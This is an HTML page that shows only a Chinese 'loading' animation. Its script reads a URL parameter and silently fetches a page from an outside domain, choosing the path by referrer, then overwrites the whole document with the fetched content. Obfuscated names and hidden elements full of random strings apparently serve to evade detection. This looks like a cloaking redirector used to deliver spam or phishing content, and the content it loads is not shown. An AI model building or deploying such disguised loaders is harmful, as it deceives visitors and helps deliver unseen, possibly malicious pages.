<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yKfTu86odMT {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yKfTu86odMT .LOU7HL {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yKfTu86odMT .content {
            line-height: 50px;
            text-align: center
        }

        .yKfTu86odMT .img {
            width: 100%
        }

        .yKfTu86odMT .mvLw0pR {
            text-align: center
        }

        .yKfTu86odMT .mvLw0pR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yKfTu86odMT .mvLw0pR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yKfTu86odMT .mvLw0pR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yKfTu86odMT .mvLw0pR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yKfTu86odMT .mvLw0pR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yKfTu86odMT .mvLw0pR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yKfTu86odMT .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function a92a8ttY0R(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var xvHZgGw = a92a8ttY0R('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ xvHZgGw +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ xvHZgGw +".html?a=share";
		}
		
        tZy6FJ=url+"#"+new Date().getTime();
        tZy6FJ && function() {
            $.get(tZy6FJ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >kR2MMwseAm5Cw8CnziuSX2</li>
<li style='display:none' >kR2MMwseAm5Cw8CnziuSX2</li>
<ul style='display:none' >kpqM00kKCS6y4zEibGLZjHYckiLC2ai8bno73zXiwJf4RIWK0</ul>
<li style='display:none' >kR2MMwseAm5Cw8CnziuSX2</li>
<img  src='' style='display:none'>
<h1 style='display:none' >bGysd7aeVCWcNxju615KgRDIspTiKZqrbvOn19DWw7DsDZB82K090M</h1><div class="yKfTu86odMT">
    <div class="LOU7HL">
        <div class="mvLw0pR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >w8Kz0kYDcnBD9oDaRdqfcfu9KtehKYK1zlhP4pUSVDzD2XX0m03kKdsQhtQKHW</ul>
<span style='display:none'>jdpxDunkCW1T2rByPF</span>
<span style='display:none'>jdpxDunkCW1T2rByPF</span>
<span style='display:none'>jdpxDunkCW1T2rByPF</span>
<div style='display:none'>OJbtWWKK710Px2qcTXx0T3hXSfWyJUUE5WUGP4yn0d3UF07LjdkroADyCPcE53aBKUOp</div>
<a  href='#' style='display:none'>Wi1G6zpgWUJ956dQATIl6acfMqQlqkK1aX6vP</a>
<div style='display:none'>OJbtWWKK710Px2qcTXx0T3hXSfWyJUUE5WUGP4yn0d3UF07LjdkroADyCPcE53aBKUOp</div>
<ul style='display:none' >w8Kz0kYDcnBD9oDaRdqfcfu9KtehKYK1zlhP4pUSVDzD2XX0m03kKdsQhtQKHW</ul>
<b style='display:none' >RV1c4VcnW2RbGM7kI8</b>
<img  src='' style='display:none'></body>
</html>